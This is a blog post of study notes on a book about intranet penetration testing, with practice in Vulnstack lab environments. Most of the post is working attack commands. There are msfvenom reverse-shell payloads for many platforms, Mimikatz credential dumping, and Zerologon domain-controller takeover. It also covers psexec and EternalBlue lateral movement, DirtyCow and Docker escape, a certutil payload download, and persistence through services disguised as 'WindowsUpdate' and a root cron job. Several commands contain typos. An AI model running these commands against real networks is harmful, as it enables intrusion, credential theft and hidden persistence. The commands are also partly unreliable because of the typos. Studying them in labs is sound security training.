[Book] Intranet Penetration Practice Strategy

First Post:

Last Update:

Word Count:
1k

Read Time:
6 min

El libro

Introduction

This article is used to keep notes and summaries of the book “Intranet Penetration Practice Strategy”.
The content will be continuously updated as I read through the book.

Reflection

This book first introduces fundamental knowledge and tools of intranet penetration testing.
It then demonstrates practical approaches to penetration testing using the provided experimental enviroment.
The following topics are covered:

  • Cobalt Strike
  • Web penetration.
  • Spreading payload(virus) in intranet.
  • Confrontation of Anti-Virus.
  • Post-Exploitation Persistence.
  • PTH(Pass-the-Hash).

While the book covers a wide range of post-exploitation techniques, it does not delve into the underlying principles behind these tools.
As a result, readers without a solid foundational background may struggle to fully understand certain features, such as the autoroute mechanism in Meterpreter, and Socks5 proxy.

Chapter.1 - Fundamental of Intranet Penetration

  • WORKGROUP
  • Domain
  • AD (Active Directory)
1
2
3
4
> systeminfo
...
Domain: WORKGROUP
...
1
2
3
4
> systeminfo
...
Domain: SomeDomain.org
...

Chapter.3 - Environment Setting-Up and Useful Tools

3.2 - Port Discovery

1
> nmap -sC -sV -v -A <TargetIP>
  • -sC: Performs a script scan using the default set of safe scripts from the Nmap Script Engine (NSE).
  • -sV: Enables version detection.
  • -v: Verbose, show more information.
  • -A: Enable OS detection, version detection, script scanning, and traceroute.

3.4 - Buster Tools

DirBuster

SNETCracker

dirsearch

https://github.com/maurosoria/dirsearch

1
> python dirsearch.py -u <Target URL> -e all

JWTPyCrack

https://github.com/Ch1ngg/JWTPyCrack

1
> python jwtcrack.py -m blasting -s jwt --kf <KeyFile>

tgsrepcrack

1
> python tgsrepcrack.py <Dictionary File> <Ticket File>

3.10 - Post-Exploitation

Msfvenom

Windows Payload

1
> msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 lhost=192.168.0.1 port=4444 -f exe -o /tmp/shell.exe

Encoded Windows Payload
1
> msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -i 3 -e x86/shikita_ga_nai lhost=192.168.0.1 port=4444 -f exe -o /tmp/shell.exe

Linux Payload

1
> msfvenom -p linux/meterpreter/reverse_tcp lhost=192.168.0.1 port=4444 -f elf > /tmp/shell.elf

macOS Payload

1
> msfvenom -p osx/x86/shell_reverse_tcp lhost=192.168.0.1 port=4444 -f macho > /tmp/shell.macho

PHP Payload

1
> msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.1 port=4444 -f raw

ASP Payload

1
> msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.1 port=4444 -f asp

ASPX Payload

1
> msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.1 port=4444 -f aspx

JSP Payload

1
> msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.0.1 port=4444 -f raw

WAR Payload

1
> msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.1 port=4444 -f war

Bash Payload

1
> msfvenom -p cmd/unix/reverse_bash lhost=192.168.0.1 port=4444 -f bash

Perl Payload

1
> msfvenom -p cmd/unix/reverse_perl lhost=192.168.0.1 port=4444 -f raw

Python Payload

1
> msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.0.1 port=4444 -f raw

Mimikatz

1
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > password.txt
1
2
privilege::debug
token::elevate
1
2
mimikatz # ts::sessions
mimikatz # ts::remote /id:1
1
2
3
4
5
6
7
8
9
10
11
# Testing Zerologon Exploit
lsadump::zerologon /target:DC.domain.com /account:DC$

# Exploit Zerologon
lsadump::zerologon /target:DC.domain.com /account:DC$ /exploit

# Clear DC password and extract authentications
lsa::dcsync /domain:domain.com /dc:DC.domain.com /user:administrator /authuser:DC$ /authdomain:domain /authpassword:"" /authntlm

# Redo clear admin password
lsadump::postzerologon /trget:domain.com /account:DC$

Chpater.4 - Vulnstack1: Spreading Through Domain’s Account

Persistence

Cobalt Strike

1
beacon> shell sc screate "WindowsUpdate" binpath="cmd /c start "C:\Users\Administrator\Desktop\Artificat.exe""&&sc config "WindowsUpdate" start=auto&&net start WindowsUpdate

Chapter.5 - Vulnstack2: Confronting Anti-Virus

Chapter.6 - Vulnstack3: Obtain DC privilege through PTH

Discovery

1
2
3
4
5
run autorun -s 192.168.93.0/24
background
use auxiliary/server/socks_proxy
set SRVPORT 6677
run

Spreading

1
2
3
4
5
use auxiliary/scanner/smb/smb_login
set rhost 192.168.93.30
set SMBUSER administrator
set PASS_FILE /root/passwd.txt
run
1
2
3
4
5
use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
set rhosts 192.168.93.30
set smbuser administrator
set smbpass 123qwe!ASD
1
systeminfo

Chapter.7 - Vulnstack4: Docker Escape/Container Breakout

Attack and Exploitation Stage

After getshell:

1
> find / -name .dockerenv

CDK

https://github.com/cdk-team/CDK

1
2
chmod +x cdk
./cdk evaluate --full

SYS_ADMIN
1
./cdk run mount-disk

1
2
3
ssh-keygen -t rsa
ls /root/.ssh/
cat /root/.ssh/id_rsa.pub

DirtyCow

https://github/com/firefart/dirtycow

1
2
3
4
5
unzip dirtycow-master.zip
cd dirtycow-master
gcc -pthread dirty.c -o dirty -lcrypt
chmod +x dirty
./dirty 123456

Check if the account firefart exists.

1
cat /etc/passwd

Config intranet proxy with metasploit

1
2
ifconfig
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.150.188 LPORT=12345 -f elf > 123456.elf

1
2
3
4
5
6
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.150.188
set LPORT 12345
run
1
2
chmod +x 12345.elf
./12345.elf
1
2
3
4
5
6
7
meterpreter> route
meterpreter> run autoroute -s 192.168.96.0/24
meterpreter> run autoroute -s 192.168.183.0/24
meterpreter> background
msf> use auxiliary/server/socks_proxy
msf> show options
msf> exploit
1
2
3
4
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.183.130
run
1
run post/windows/gather/smart_hashdump
1
2
3
4
5
6
7
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.183.129

msf> set SMBUser TESTWIN7-PC
msf> set SMBPass
msf> run

Persistence and Recovery Stage

1
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.210.111 LPROT=17918 -f elf > 17918.elf
1
chmod +x 17918.elf
1
vim /var/spool/cron/crontabs/root

Chapter.8 - Vulnstack5: Using PsExec to Exploit a DC With NO Internet Access

Discovery and Spreading

1
certutil.exe -urlcache -split -f http://x.x.x.x/payload.exe
1
2
beacon> shell netsh firewall show state
beacon> shell advfirewall set allprofiles state off

Persistence and Recovery

1
2
3
4
beacon> shell sc config "windows update" start=auto
beacon> shell sc description "windows update" "Windows patch"
beacon> shell net start "windows update"
beacon>

Chapter.9 - Exploiting Zerologon and Obtain DC’s Privilege

Chapter.10 - Penetrating Multi-Level Intranet With Different Service Exploitation

Chapter.11 - Obtain DC’s Privilege Through SPN